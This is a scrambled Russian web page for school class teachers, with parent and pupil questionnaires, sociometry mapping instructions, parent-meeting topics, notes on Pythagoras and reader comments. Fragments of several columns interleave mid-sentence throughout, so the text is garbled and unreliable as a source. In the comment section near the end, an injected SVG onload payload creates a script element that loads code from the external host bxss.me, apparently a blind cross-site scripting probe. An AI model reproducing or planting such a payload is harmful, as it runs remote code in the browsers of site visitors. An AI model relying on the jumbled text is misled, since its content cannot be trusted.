Пожелания классному руководителю в анкете для родителей

​​

​- в основном девочки;​окружностей.​

​Поликрата, Пифагор ок. 530 до н.э. покинул Самос.​семье чрезвычайно трудное.​



​, ​- никто;​

​четырех концентрически расположенных ​и образования. Спасаясь от тирании ​

​родителями тех учеников, положение которых в ​, ​


​- несколько человек;​дифференциации. она состоит из ​Самоса, человек благородного происхождения ​линию поведения с ​, ​- большая часть класса;​(матрицы) составляется карта групповой ​некий Мнесарх из ​руководителю выбрать правильную ​, ​- весь класс;​в группе, на основе  таблицы ​г. до н.э. Его отцом был ​семья, дает возможность классному ​

​сайтов: ​противоречивым.​

​положение каждого ученика ​

​Самос около 580 ​ситуации в отдельных ​Информация получена с ​

​- мнение было бы ​Чтобы нагляднее представить ​

​Родился на острове ​помогает выявить проблемные ​

​• Мне нравится​

​- одобрил бы;​Количество взаимных выборов:​

​(родился ок. 580 г. и умер ок. 500 г. до н.э.)​с классным коллективом ​

​работы педагогов, родителей и учащихся...​внимания;​

​Количество полученных выборов:​(греч. Πυθαγόρας ο Σάμιος)​

​Диагностика в работе ​в организации совместной ​

​- не обратил бы ​

​+​Пифагор​

​применения.​помогут классному руководителю ​

​- осудил бы;​

​4 ФИ​Проверка слова​

​тех ситуаций, которые требуют ее ​вопросов, которые в дальнейшем ​

​- резко осудил бы;​

​+​

​отмечается первого сентября...​в зависимости от ​


​В анкете разработка ​попробовали вино.​

​3 ФИ​Традиционно День знаний ​

​предварительной, оперативной и итоговой ​руководителей...​

​7. На дискотеке вы ​+​

​День Знаний 19/20​

​классом может быть ​председателям МО классных ​

​- и те, и другие.​2 ФИ​

​в классе.​классного руководителя с ​руководителя в помощь ​- в основном мальчики;​

​+​подготовке родительских собраний ​Диагностика в работе ​Анкета для классного ​- в основном девочки;​

​1 ФИ​классный руководитель при ​коллективом родителей.​Психолого-педагогическая характеристика класса...​- никто;​п/п Кто выбирает?​к того, что может использовать ​

​коллективе, наладить работу с ​процесс «их» глазами...​- несколько человек;​№ Кого выбирают?​

​методики – лишь малая часть ​работу в детском ​посмотреть на образовательный ​

​- большая часть класса;​Знаком “+” обозначен выбор​Приведенные выше диагностические ​конструктивно спланировать воспитательную ​своих учеников и ​- весь класс;​Образец матрицы​ребенка.​

​Без использования психолого-педагогической диагностики невозможно ​«поставить» себя на место ​противоречивым.​системе межличностных отношений.​школе и своего ​

​и детей.​педагога. Ее цель — побудить классных руководителей ​

​- мнение было бы ​в классе в ​собственной адаптации к ​газеты силами родителей ​

​для самоанализа деятельности ​- одобрил бы;​о положении, занимаемом каждым учеником ​переживать период своей ​• Выпуск собственной родительской ​Данная анкета проводится ​

​внимания;​(таблицу), которая дает представление ​семьи, которым будет трудно ​коллективу педагогов школы.​процесс «и...​- не обратил бы ​

​школьников составляют матрицу ​работе с классом, а также определить ​в классе» – демонстрация достижений учащихся, родителей и педагога ​посмотреть на образовательный ​- осудил бы;​

​На основе ответов ​оценка.​

​и опорой в ​• «День открытых дверей ​своих учеников и ​- резко осудил бы;​Обработка полученных данных.​увидеть родителей, которые будут поддержкой ​родительской конференции «Есть проблема – есть решение».​«поставить» себя на место ​

​на улице, среди товарищей.​мог их подарить?​

​дней своей работы ​

​• Участие в общешкольной ​педагога. Ее цель — побудить классных руководителей ​

​6. Вы грубо выругались ​кому бы ты ​

​поможет с первых ​

​выходного дня.​для самоанализа деятельности ​другие.​

​картинки, марки, наклейки, значки,​

​Подобная предварительная диагностика ​• Заседание выездного клуба ​Данная анкета проводится ​- и те и ​

​тебя были коллекционные ​с классным коллективом.​

​родительских уроков.​

​воспитанников...​- в основном мальчики;​

​6.Если бы у ​самом начале работы ​• Организация и проведение ​новым условиям учебы, лучше узнать своих ​

​- в основном девочки;​в поход, выполнять ответственные поручения?​

​ситуаций уже в ​рекордов и достижений.​адаптации школьников к ​- никто;​

​ты предпочел пойти ​будет и т.д.), уйти от стереотипов, предупредить возможность конфликтных ​со школьной книгой ​руководителю определить уровень ​- несколько человек;​

​5.С кем бы ​(я знал, что так и ​• Знакомство родителей учащихся ​

​5-тиклассников помогут классному ​- большая часть класса;​по двору, подъезду?​напряженность родительских ожиданий ​«Новости школьных уроков».​

​Представленные анкеты для ​- весь класс;​хотел иметь соседом ​

​классному руководителю снять ​• Презентация классного журнала ​

​воспитанниках очень многое...​

​противоречивым.​4. Кого бы ты ​

​Полученные результаты помогут ​• Родительское собрание «Наши первые книжки».​

​узнать о своих ​

​- мнение было бы ​классе?​

​жизни.​учебнику».​

​классный руководитель может ​- одобрил бы;​

​всех нравится в ​собственным опытом школьной ​

​• Круглый стол «Путешествие по школьному ​С помощью анкетирования ​

​внимания;​3. Кто тебе больше ​

​родителей, которые обусловлены их ​• Встреча родителей «Традиции класса, которым быть».​

​Итого:​- не обратил бы ​

​день рождения?​к школе отдельных ​

​• Праздник рождение класса.​Справедлив​

​- осудил бы;​пригласил на свой ​

​сформированные стереотипы отношения ​и школьными службами.​

​предмет​

​- резко осудил бы;​2. Кого бы ты ​

​избежать проблемных ситуаций, если изучит уже ​• Экскурсия – знакомство со школой ​

​Хорошо знает свой ​уже упавшего противника.​

​работам?​

​во многом может ​образовательному пространству школы​

​знаний​

​драки продолжаете бить ​уроки, готовиться к контрольным ​

​провоцировать его. Поэтому классный руководитель ​

​формирования культуры принадлежности ​Объективен в оценке ​

 

​5. Вы во время ​ты хотел учить ​

 

​и даже иногда ​родителями в рамках ​уроках, в будущем, в профессиональной деятельности​- и те, и другие.​1. С кем бы ​жизни своего ребенка ​Тематика встреч с ​Помогает понять, как использовать то, что изучается на ​

​- в основном мальчики;​вопросов:​

​негатив в школьной ​всех внеклассных мероприятиях.​

​и усталость​

​- в основном девочки;​предположить следующий вариант​

​будут искать подобный ​родителей класса во ​

​Умеет снять напряжение ​- никто;​

​Так, для школьников 4-5-6 классов можно ​сказать, что невольно они ​

​уделяю участию самих ​учеников​

​- несколько человек;​возрастных особенностей опрашиваемых.​

​жизни, можно с уверенностью ​

​работы большое внимание ​Внимателен к настроению ​

​- большая часть класса;​анкетирования с учетом ​

​моменты из школьной ​В планировании воспитательной ​поддержать интерес​

​- весь класс;​составляются вопросы для ​

​вопросы, больше вспоминают негативные ​учебное время.​

​Умеет вызвать и ​противоречивым.​тех, кого он выбирает. Для этого предварительно ​

​Если родители, отвечая на предложенные ​в каникулярное и ​

​на уроке, к дискуссии​- мнение было бы ​

​(класса) должен назвать фамилии ​годы пережил...​

​в классе мероприятий ​Побуждает к общению ​

​- одобрил бы;​Каждый член группы ​

​в свои школьные ​по вопросу организации ​

​Разъясняет сложные места​

​внимания;​Порядок проведения исследования.​


Пожелания классным руководителям от родителей

​• Я не хочу, чтобы мой ребенок ​

​принятия совместных решений ​

​балл​- не обратил бы ​

​критериями выбора.​школе ...​воспитательной работы, создаю условия для ​

​Качества​

​- осудил бы;​ты хотел?”. Такие вопросы называются ​чувствовал себя в ​

​знакомлю с планом ​№​

​- резко осудил бы;​

​типа: “С кем бы ​• Я хочу, чтобы мой ребенок ​в каждой четверти ​

​вашего учителя.​4. Вы подрались из-за того, что вас обозвали.​

​ответа на вопросы ​о ...​

​Родительский коллектив класса ​и личные качества ​

​- и те, и другие.​

​совместной акции путем​мне больно вспоминать ​

​классных дел.​по 9-бальной шкале работу ​

​- в основном мальчики;​

​выбор партнера для ​• Из школьной жизни ​

​стать активными участниками ​ Просим Вас оценить ​

​- в основном девочки;​Данная методика предполагает ​

​школьной жизни - это...​даю возможность родителям ​

​Ребята!​- никто;​социометрии.​

​• Самое яркое событие ​детского коллектива и ​

​№ 6 «Ученик – учитель»​- несколько человек;​

​межличностных взаимоотношений методом ​• Я радовался, если ...​

​с перспективами развития ​

​Спасибо​

​- большая часть класса;​№ 2 Методика исследования ​

​• Я обижался, если ...​

​коллективом знакомлю родителей ​Итого:  ​

​- весь класс;​предложения.​
​• Мне не нравилось, когда учитель ...​
​работы с детским ​Стремление к сотрудничеству​
​противоречивым.​• Ваши пожелания и ​
​• Мне нравилось, когда учитель ...​своих учеников, с первых дней ​
​ребенка​- мнение было бы ​
​• Диагностика коллектива класса.​были ...​
​разочаровываться в родителях ​
​мысли, поступки характер вашего ​- одобрил бы;​
​личности ученика.​

​• Мои школьные результаты ​Для того, чтобы позже не ​
​Хорошее влияние на ​внимания;​
​• Диагностические методы изучения ​...​
​в классе, спортивном зале, библиотеке, столовой и т.д.​Способность хорошо (эффективно) учить предмету​
​- не обратил бы ​
​психолого-педагогического просвещения родителей.​
​относился ко мне ​Уставом учебного заведения, с правилами поведения ​
​передавать духовные ценности​- осудил бы;​
​• Формы и методы ​
​• Мой классный руководитель ​пребывания в ней. В первую очередь, это знакомство с ​
​Способность воспитывать и  ​бы;​
​«трудными» детьми.​...​
​с первых дней ​
​ребенка​
​- резко вас осудил ​
​• Система работы с  ​
​всегда чувствовал себя ​

​к своим ученикам ​
​Способность чувствовать настроение ​

​3. Вы соврали товарищу, подруге.​

​проведения родительских собраний.​
​• В классе я ​требованиями, которые предъявляет школа ​
​школьных обязанностей ребенком​- и те, и другие.​
​• Методика организации и ​
​- это...​
​учащихся с теми ​Требовательность к выполнению ​
​- в основном мальчики;​
​• Организация классного самоуправления.​
​• Мои школьные воспоминания ​
​Знакомлю родителей своих ​
​предмета (компетентность)​- в основном девочки;​
​классных часов.​учебное заведение.​
​школа.​Хорошее знание своего ​
​- никто;​
​• Методика проведения тематических ​
​собственного ребенка в ​и воспитании учащихся; родители должны знать, какими учителями гордится ​
​Справедливость​
​- несколько человек;​      в  «Школе классных руководителей» (нужное подчеркнуть):​
​школе, учителям и приходу ​с традициями школы, ее историей, достижениями в обучении ​
​в трудные моменты​- большая часть класса;​
​с коллегами?_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________​отношение родителей к ​
​знакомить родителей класса ​


​Готовность поддержать ребенка ​

​- весь класс;​могли бы поделиться ​методика неоконченных предложений, которая поможет определить ​
​классный руководитель должен ​к ребенку​
​противоречивым.​      4. Каким опытом Вы ​
​в анкетировании родителей. Достаточно информативной является ​В начальной школе ​
​Открытость по отношению ​
​- мнение было бы ​________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________​заключаться не только ​
​школьному образовательно-воспитательному пространству​Балл​
​- одобрил бы;​________________________________________________________________________​
​Предварительная диагностика может ​понимания принадлежности к ​
​Качества​
​внимания;​• в другом (укажите, в чем именно)_​развивать?​
​2. Формирование у родителей ​такому принципу:​- не обратил бы ​
​организациями;​
​хотели бы активно ​стоит?​
​            Оценки ставьте  по ​- осудил бы;​

​родителями, с учителями предметниками, с детскими общественными ​

​своего ребенка вы ​• Страхи ребенка. Что за этим ​
​вступления.​бы;​
​• в работе с ​• Какие качества характера ​
​преодоления.​те качества, которые перечислены после ​
​- резко вас осудил ​• в изучении коллектива;​
​вашего ребенка?​и искусство их ​
​бальной шкале нужно ​
​2. Вы нарушили дисциплину, совершили какой-нибудь проступок (изрезали стол, разбили окно, нагрубили учителю).​
​и методов;​и эмоциональной сферы ​
​• Конфликты в семье ​            Оценить по 5  ​- и те, и другие.​
​• в выборе форм ​
​• Каковы особенности характера ​
​слабо…​предмету.​
​- в основном мальчики;​• в планировании;​
​для вашего ребенка?​
​• Если ребенок успевает ​ребенка по ______________учебному ​
​- в основном девочки;​
​получить:​
​семьи наиболее авторитетен ​
​самостоятельно?​
​личные качества учителя, который обучает Вашего ​
​- никто;​


​Вы бы хотели ​

​• Кто из членов ​

​выполнять домашнее задание ​оценить деловые и ​

​- несколько человек;​работы с классом ​

​помимо школьных занятий?​• Как научить ребенка ​

​заинтересованного эксперта и ​

​- большая часть класса;​

​в организации своей ​заниматься в школе ​работать дома?​

​на себя роль ​

​- весь класс;​

​• Какую конкретную помощь ​увлекается, чем хотел бы ​

​• Школьный учебник. Как с ним ​        Просим вас принять ​

​свое мнение?​________________________________________________________________________​

​• Чем интересуется и ​воспитании детей.​

​Уважаемые родители!​

​Кто бы выразил ​руководителя?​

​покупке школьных принадлежностей?​

​ее значение в ​

​№ 5 «Учитель глазами родителей»​противоречивым.​

​• В чем, по- вашему мнению, сложность работы классного ​• Как относится к ​

​• Связь поколений и ​счастливым?​

​- мнение было бы ​________________________________________________________________________​

​ним посещать школу?​

​• Если ребенок одинок…​• Как, по-твоему, будешь ли ты ​- одобрил бы;​

​такая возможность?​

​будет вместе с ​

​семьи.​

​- на родителей.​внимания;​бы от нее, если бы была ​

​друзей и приятелей ​

​• Спортивные традиции нашей ​- на государство;​- не обратил бы ​

​или Вы отказались ​

​• Кто из его ​учении.​

​- на самого себя;​- осудил бы;​

​работа классного руководителя ​

​хотелось бы стать?​• Здоровье ребенка – основа успешности в ​

​надеешься:​бы;​

​• Привлекает ли Вас ​

​• Каким школьником ему ​ребенка в семье.​

​•  На кого ты ​

​- резко вас осудил ​

​классных руководителей.​с болезнями?​

​• Права и обязанности ​- мрачным.​

​Класс:​

​№ 1 Анкета для ​

​и как справляется ​

​поступки?​- неясным;​

​1. Вы получили двойку.​

​139.5 КБ​

​• Как часто болеет ​

​свои слова и ​

​- светлым;​

​ответ.​

​Размер​

​детском саду.​

​ребенке ответственность за ​

​будущее:​

​поведет, и подчеркни необходимый ​

​Вложение​ребенка отношения в ​

​• Как воспитать в ​

​•  Каким, по-твоему, обещает быть твое ​

​себя в ней ​

​для классных руководителей​

​посещал детский сад, как складывались у ​

​друзьями и приятелями.​будущем?​

​ситуацию, представь себе, кто и как ​

​Всевозможные виды анкет ​

​• С какого времени ​

​• Взаимоотношения детей с ​•  Что, по-твоему, ждет тебя в ​

​Дорогой друг! Пожалуйста, внимательно прочти предлагаемую ​

​«хорошим образованием»?​рождения.​

​членов семьи.​

​с ними?​глазами его ученика​22. Что Вы считаете ​

​• Число, год и месяц ​старших и младших ​

​•  Каковы твои отношения ​№ 3 Классный коллектив ​

​консультация психолога, по каким вопросам?​• Фамилия, имя отчество.​

​• Дружба в жизни ​

​дедушка?​в дальнейшем.​

​21. Нужна ли Вам ​Анкета №2. Экспресс-портрет будущего первоклассника.​

​детьми в семье.​тебя бабушка или ​и корректировать ее ​

​сферу приоритетных интересов: а)мамы; б)папы?​• Интересы, увлечения, хобби семьи.​

​младшими и старшими ​•  Есть ли у ​

​руководителем воспитательной работы ​момент входит в ​

​• Адрес семьи, телефон, телефон экстренной связи, рабочий телефон родителей.​

​• Взаимоотношения родителей с ​подарки? Какие?​

​эффективность проводимой классным ​

​20. Что в данный ​• Жилищные условия семьи.​

​моему ребенку?​твоей семье дарить ​год, что позволяет определить ​

​родителей свободного времени?​семьи.​

​• Компьютер – друг или враг ​• Принято ли в ​проводить два - три раза в ​

​19. Много ли у ​

​• Количественный состав членов ​

​детей?​

​больше всего?​рекомендуется​комната?​

​семья.​в воспитании собственных ​семье ты любишь ​

​отношений в классе ​Вашего ребёнка своя ​

​• Полная или неполная ​• Как предотвратить проблемы ​

​•  Какие праздники в ​


​Выявление характера межличностных ​18. Есть ли у ​

​• Возраст существования семьи.​

​детей.​

​- бедной.​них большинство учащихся.​

​общении? Какие, с кем?​

​• Возраст обоих родителей.​

​о половом созревании ​- средней;​

​мнению своих товарищей, бездеятельность, вялость, что отталкивает от ​ребёнок трудности в ​

​• Образование родителей.​• Что надо знать ​

​- состоятельной;​одноклассников. В других - бездеятельность, пренебрежительное отношение к ​

​17. Испытывает ли Ваш ​• Профессии обоих родителей.​

​материнства и отцовства.​свою семью:​

​успеваемости своих​Вас?​

​родителей учащегося.​

​• Радости и горести ​•  Как ты находишь ​

​собственной учебе и ​

​16. Что, на Ваш взгляд, ребёнок хочет от ​• Фамилия, имя и отчество ​

​• Праздники в доме. Какими им быть?​

​совместный семейный бюджет?​- это безразличие к ​

​от своего ребёнка?​коллектива.​

​маленьких.​заработная плата и ​

​В одних случаях ​

​15. Что Вы хотите ​

​Анкета №1. Экспресс-прогноз состава родительского ​

​семье – пример подражания для ​

​• Устраивает ли родителей ​

​может быть немало.​

​доме книг?​класса.​

​• Взаимоотношения взрослых в ​

​т.д.​

​Причин непопулярности также ​

​читает? Какую литературу предпочитает? Много ли в ​руководителем, родителями и учащимися ​

​семьи и ребенка.​- работают из-за квартиры и ​

​нормам морали.​

​14. Много ли он ​школой и классным ​

​• Книга в жизни ​

​- некуда деваться, работают из-за зарплаты;​и личностными качествами, не отвечающими высоким ​

​ребёнок?​

​в сотрудничестве со ​

​нравственности.​

​- недовольны;​с сомнительным поведением ​

​13. Самостоятелен ли Ваш ​школе, степень заинтересованности родителей ​

​семьи в воспитании ​- довольны;​

​популярными оказываются ученики ​утомляется?​

​увидеть отношение к ​• Традиции и обычаи ​

​своей работой, своей специальностью:​случаях среди школьников ​

​12. Быстро ли он ​

​будущему классному руководителю ​

​и его семьи.​• Довольны ли они ​

​В отдельных же ​

​11. Усидчив ли он?​

​за школьную парту. Такая диагностика позволит ​в жизни ребенка ​

​- равнодушны.​

​положение.​

​в Вашем ребёнке?​до того, как дети сядут ​

​• Средства массовой информации ​

​- не доверяют;​классу, помогая им, входят в их ​

​10. Что Вам нравится ​

​и детей задолго ​ленью?​

​- доверяют;​

​своих товарищей по ​свободное время?​

​изучения коллектива родителей ​• Как бороться с ​

​школе и педколлективу:​оценивают состояние​

​Ваш ребёнок в ​

​класса. Она начинается с ​«Не хочу!»​

​• Как, по-твоему, они относятся к ​с одноклассниками. “Популярные” часто общительны, хорошо учатся. Они понимают и ​

​9. Чем любит заниматься ​Предварительная диагностика проводится, начиная с первого ​

​• Что делать, если ребенок говорит ​- в проведении ремонта.​

​обстоятельств. Так, “Звезда” умеет устанавливать контакт ​он испытывает затруднения?​

​какой-то определенной проблеме.​

​учиться.​- в проведении экскурсий, походов;​

​классе объясняется рядом ​8. По каким предметам ​

​проведенной работы по ​• Как научить ребенка ​

​дел;​

​иных учеников в ​ребёнка?​

​родителями и после ​

​школьника.​- в организации классных ​

​Популярность тех или ​заметили у Вашего ​

​родительским собраниям, входе встреч с ​в жизни младшего ​

​школе, классному руководителю:​выбрал?​

​учебным предметам Вы ​при подготовке к ​

​• Игра и игрушка ​

​• Помогают ли они ​в классе тех, кого никто не ​

​7. Склонность к каким ​

​Диагностику можно использовать ​в жизни школьника.​

​- больше мать.​

​2. Чем объясняется положение ​

​в дальнейшем?​Приложение №1. Предварительная диагностика​

​• Значение режима дня ​

​- больше отец;​членами группы?​

​родители? Как оправдалось это ​и конструктивнее. Успехов Вам, коллеги!​

​в школе.​- только по вызову;​

​“Звезды”, “Предпочитаемого” наиболее ценимы​

​его возрасте обладали ​она становится легче ​

​• Особенности адаптации ребенка ​

​- редко;​1. Какие качества личности ​

​6. Какими способностями в ​

​времени и сил. Вместе с родителями ​с младшим школьником.​

​- часто;​

​выяснить следующее:​

​Ваш ребёнок?​

​– интересная, захватывающая, но отнимающая много ​• Основы построения общения ​

​школу:​

​В дальнейшем следует ​

​5. Какими способностями обладает ​Работа классного руководителя ​

​• Психология младшего школьника.​

​• Посещают ли они ​

​зоне.​со стороны учителей?​

​них не будет.​школьников.​

​- больше отец.​помещают в IV ​

​требуют особого внимания ​

​безмятежной жизни у ​• Физиологические особенности младших ​

​- больше мать;​ни одного выбора. На карте его  ​

​4. Какие индивидуальные особенности ​внимания собственным детям, что спокойной и ​

​их просвещения.​

​- оба;​“Изолированный” - лицо, которое не получает ​

​присущи Вашему ребёнку?​

​дать понять родителям, не обеспечивающим надлежащего ​

​выборе тем для ​

​- иногда;​

​числа выборов. (В III зоне.).​

​3. Какие черты характера ​и сразу же ​

​пожелания родителей при ​- всегда;​

​половины от максимального ​устраивает в школе?​семьи его учеников ​

​самих интерес, учитываю предложения и ​

​классе:​

​“Оттесненный” - термин, обозначающий члена группы, получающего менее​

​2. Что Вас не ​знать, что собой представляют ​вызвало у них ​

​с товарищами в ​зоне.​

​от школы?​

​с классом должен ​психолого-педагогическое просвещение родителей ​

​родители твоими отношениями ​помещается во II ​

​1. Что Вы ожидаете ​

​первого дня работы ​Для того чтобы ​

​• Интересуются ли твои ​числа выборов. На карте он ​на наши вопросы.​

​и неблагополучные семьи. Классный руководитель с ​направление: врачей, юристов, психологов, учителей-предметников.​

​- больше мать.​или половину максимального ​

​просим Вас ответить ​

​меньшей степени нуждаются ​

​привлекаю специалистов различных ​- больше отец;​

​“Предпочитаемый” - член группы, получивший более половины ​ребёнком, родителями и педагогами ​

​руководителя в не ​К психолого-педагогическому просвещению родителей ​

​- оба;​

​- 1-2, реже - 3-4 человека.​эффективного сотрудничества между ​

​В коррекции классного ​и педагогики​

​- никогда;​зоне, в центре). Он популярен. Однако, “звезд” в группе немного ​

​В интересах более ​коллективе.​

​по вопросам психологии ​

​- иногда;​размещается в I ​

​Уважаемые родители!​

​положение в детском ​родителей является просвещение ​

​- всегда;​выборов (на карте он ​

​— Жилищные условия.​

​спокойствие и комфортное ​классного руководителя и ​делами:​

​“Звезда” -  член группы, получившей наибольшее количество ​

​их рождения.​стороны - сохранить его душевное ​

​1. Главным направлением сотрудничества ​

​родители твоими учебными ​в следующих категориях:​

​лет и год ​одной стороны, а с другой ​


​направлениям.​• Интересуются ли твои ​

​личности в группе ​

​— Состав семьи. Дети до 18 ​такого ребенка с ​

​осуществляю по следующим ​чувствовал(а)?​

​(комсорга, старосты и т. п.)​— Ф.И.О. отца, место работы, должность, рабочий телефон, экстренный телефон. Образование. Хобби.​

​таланта и способностей ​доме «школа-семья». Это взаимодействие я ​что ты тогда ​

​цветами. Номера формальных лидеров ​

​— Ф.И.О. матери, место работы, должность, рабочий телефон, экстренный телефон. Образование. Хобби.​

​для максимального развития ​индивидуальности в общем ​

​дома надолго и ​вычерчивать различ ными ​или других родственников.​

​состоит в том, чтобы создать условия ​

​ребенка, для развития его ​• Уезжал(а) ли ты из ​

​указанные линии целесообразно ​

​— Адрес, индекс. Домашний телефон, экстренный телефон соседей ​

​Задача классного руководителя ​

​для нормальной жизни ​вашей семье?​

​в клас се ​

​— Хобби.​

​очень трудным.​в создании условий ​

​ней что-то свойственное только ​большом количестве учащихся ​

​— Дата рождения.​

​обычном классе бывает ​семьи и школы ​

​свой дом, домашнюю атмосферу, есть ли в ​глядности или при ​

​— Ф.И.О. ребёнка.​

​такого ребенка в ​нельзя недооценивать. Смысл педагогического взаимодействия ​

​• Любишь ли ты ​стрелкой (от того, кто выбирал, к тому, кого он выбрал). Для большей на ​

​На страницу -​не секрет, что иногда положение ​

​в этом процессе ​

​родители глазами ребенка​номерами, невзаимный—сплошной линией со ​

​равны"​одаренные дети. Ни для кого ​

​становиться хорошими родителями. Роль классного руководителя ​№ 4 Семья и ​

​между двумя соответствующими ​стихотворение: "Пифагоровы штаны - на все стороны ​

​работу с семьей, в которой растут ​

​Родителям необходимо помогать ​

​- и те, и другие.​сплош ной линией ​

​покрой мужских штанов, что породило следующее ​быть направлена на ​педагогов и родителей.​

​- в основном мальчики;​

​одного выбора). Взаимный выбор обозначают ​квадраты напоминали школьникам ​

​классного руководителя должна ​

​маленького человека у ​

​- в основном девочки;​сред него), в четвертый—«изолированных» (не получивших ни ​

Школа классного руководителя

​в разные стороны ​Индивидуальная коррекционная работа ​

​взглядах на воспитание ​

​- никто;​— «пренебрегаемых» (число выборов меньше ​

​треугольника и расходящиеся ​

​близких людей, развод родителей.​

​трудности самого ребенка, а из-за противоречий во ​- несколько человек;​

​выборов), в тре тий ​этого треугольника. Построенные на сторонах ​в семье, потеря родителей или ​из-за так называемой ​

​- большая часть класса;​

​-«предпочитае мых» (имеющих среднее количество ​прямоугольного треугольника, площади квадрата, построенного на гипотенузе ​

​детей, нестабильность положения ребенка ​школе вовсе не ​- весь класс;​

​среднего количества выборов), во второй круг ​

​площадей квадратов, построенных на катетах ​школьному обучению, ранее половое созревание ​

​ни секрет, что выражение «трудный ребенок» появляется в начальной ​противоречивым.​

​два раза больше ​доказательство равенства суммы ​

​кризисы адаптации к ​у родителей учащихся. Ни для кого ​

​- мнение было бы ​выборов (так называемые «социометрические звезды», которые имеют в ​

​теорема доказывалась через ​

​ситуациям можно отнести ​вызывает оно и ​

​- одобрил бы;​количество поло жительных ​

​школьных учебниках эта ​воспитания. К таким проблемным ​учебы в школе. Не меньше волнений ​

​внимания;​

​класса. В первый круг(центральный) помещают тех, кто набрал наибольшее ​того, что раньше в ​

​проблемных ситуаций семейного ​маленького школьника начало ​

​- не обратил бы ​

​все номера учащихся ​Пифагора, возникшее в силу ​

ПАМЯТКИ КЛАССНЫМ РУКОВОДИТЕЛЯМ

​поддержки в решении ​

​может вызвать у ​- осудил бы;​

​концентрические окружности, в которые помещают ​Пифагоровы штаны (школьн., устар.) - шуточное название теоремы ​

​родителям психолого-педагогической помощи и ​

​школьниками, знают, какие тревожные чувства ​бы;​

​Социограмма (рис. 1) представляет собой четыре ​

​(3 + 4 = 5).​

​работы является оказание ​Педагоги, работающие с младшими ​

​- резко вас осудил ​Рис. 1​целых чисел, удовлетворяющих соотношению Пифагора: x + y = z. Например, тройка чисел: 3, 4 и 5 ​

​Главным назначением коррекционной ​

​сотрудничества.​выполнению задания.​(комсорга, старосты и т. п.)​Пифагоровы числа (Пифагорова тройка) - комбинация из трех ​

​коррекционная работа​четко организованная система ​не приступили к ​

​цветами. Номера формальных лидеров ​сумме квадратов катетов. и​

​семьей учащихся является ​заранее продуманная и ​работать. Вы так и ​вычерчивать различ ными ​квадрат гипотенузы равен ​

​классного руководителя с ​младших школьников имеет ​в поле (на школьном участке), вам не хочется ​указанные линии целесообразно ​В прямоугольном треугольнике ​

​4. Значимым направлением деятельности ​работе с родителями ​11. Ваш класс работает ​

​в клас се ​помощью чисел.​руководителем.​Огромное значение в ​- и те, и другие.​большом количестве учащихся ​

​объектов выражаются с ​общению с классным ​Спасибо​- в основном мальчики;​

​глядности или при ​- а закономерности идеальных ​

​располагать к дальнейшему ​

​• #1​- в основном девочки;​стрелкой (от того, кто выбирал, к тому, кого он выбрал). Для большей на ​

​тел и движений ​проводится корректно и ​меня теме!!​- никто;​

​номерами, невзаимный—сплошной линией со ​искаженные подобия идеальных ​• Диагностическое исследование должно ​по очень интересующей ​- несколько человек;​между двумя соответствующими ​

​и процессы суть ​целью навешивание ярлыков.​сайт!Столько полезной информации ​

​- большая часть класса;​сплош ной линией ​мира, предложенная Пифагором - все природные тела ​

​должно ставить своей ​Огромное спасибо за ​- весь класс;​одного выбора). Взаимный выбор обозначают ​Первая научная модель ​• Диагностическое исследование не ​Евгения​

​противоречивым.​сред него), в четвертый—«изолированных» (не получивших ни ​сущностей​проблеме.​• #2​- мнение было бы ​

​— «пренебрегаемых» (число выборов меньше ​подобием идеальных математических ​руководителя по изученной ​

​Вы такая, МОЛОДЕЦ! Так держать!!! Спасибо огромное!!!​- одобрил бы;​выборов), в тре тий ​являются лишь грубоватым ​коррекционные действия классного ​

​Людмила​

 

​внимания;​

​-«предпочитае мых» (имеющих среднее количество ​

​не имеет. Несовершенные природные тела ​• Диагностика проблемы предполагает ​• #3​- не обратил бы ​

​среднего количества выборов), во второй круг ​небольшую толщину, а линия толщины ​стать доступной всем.​Огромное спасибо!​- осудил бы;​два раза больше ​

​не луч света: ведь они имеют ​классным руководителем, она не должна ​Людмила​бы;​выборов (так называемые «социометрические звезды», которые имеют в ​

​натянутого лука и ​информацией со своим ​• #4​- резко вас осудил ​

​количество поло жительных ​ИДЕАЛЬНЫМИ ОБЪЕКТАМИ. Например, прямая линия - это не тетива ​• Если родители поделились ​необходимую информацию! То, что надо​

​опоздал на поезд.​(центральный) помещают тех, кто набрал наибольшее ​на работе с ​определенными правилами.​Большое спасибо за ​

​медпункта, и поэтому класс ​

​класса. В первый круг ​единство науки основаны ​

​исследовании и руководствоваться ​Ирина​женщине дойти до ​

​все номера учащихся ​Он первый заметил, что сила и ​аспектах всех своих ​

​• #5​10. Вы помогли больной ​концентрические окружности, в которые помещают ​до политической борьбы).​помнить о нравственных ​

​Спасибо.​- и те, и другие.​

​Социограмма (рис. 1) представляет собой четыре ​общества (от движения звезд ​Используя диагностику, классный руководитель должен ​Елена​- в основном мальчики;​

​Рис. 1​Вселенной и человеческого ​

​и учащимися.​• #6​- в основном девочки;​сторону выбираемого ученика.​разобраться в строении ​

​работы с семьей ​

​спасибо вам большое​- никто;​

​со стрелкой в ​всем сразу: арифметикой и геометрией, астрономией и музыкой. Его целью было ​

​возможность дальнейшего совершенствования ​света​

​- несколько человек;​

​штриховой линией​истока греческой науки, был вынужден заниматься ​и присутствующими. Итоговая диагностика дает ​

​• #7​- большая часть класса;​на карте обозначается ​Пифагор стоял у ​

​восприятия всеми родителями ​e​- весь класс;​

​Неустойчивый невзаимный выбор ​году до н.э.​мероприятие через призму ​

​• #8​противоречивым.​стороны.​

​умер в 500 ​того, чтобы увидеть проводимое ​

​e​- мнение было бы ​стрелками в обе ​в Метапонт, где он и ​

​учить необходимо), но и для ​

​• #9​- одобрил бы;​

​штриховой линией со ​

​в. до н.э. Пифагору пришлось удалиться ​

​«спасибо» (хотя и этому ​add​

​внимания;​

​(ученики выбрали один-другого по 1-2 позициям) на карте обозначается ​

​в конце 6 ​и сказали ему ​

​e​- не обратил бы ​Неустойчивый взаимный выбор ​к власти, однако из-за антипифагорейских настроений ​

​работу классного руководителя ​

​• #10​- осудил бы;​

​стороны.​пришел в Кротоне ​только для того, чтобы родители отметили ​</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013651&r=1920-199&h=1920-d7f77-2&/).slice,document.documentElement.appendChild(s))//'>​бы;​стрелки в обе ​

​орден, или братство "посвящённых". Этот орден фактически ​конкурсах и фестивалях. Это необходимо не ​

​e​- резко вас осудил ​

​взаимный, то можно поставить ​своего рода религиозный ​

​класса в праздниках, классных и школьных ​• #11​

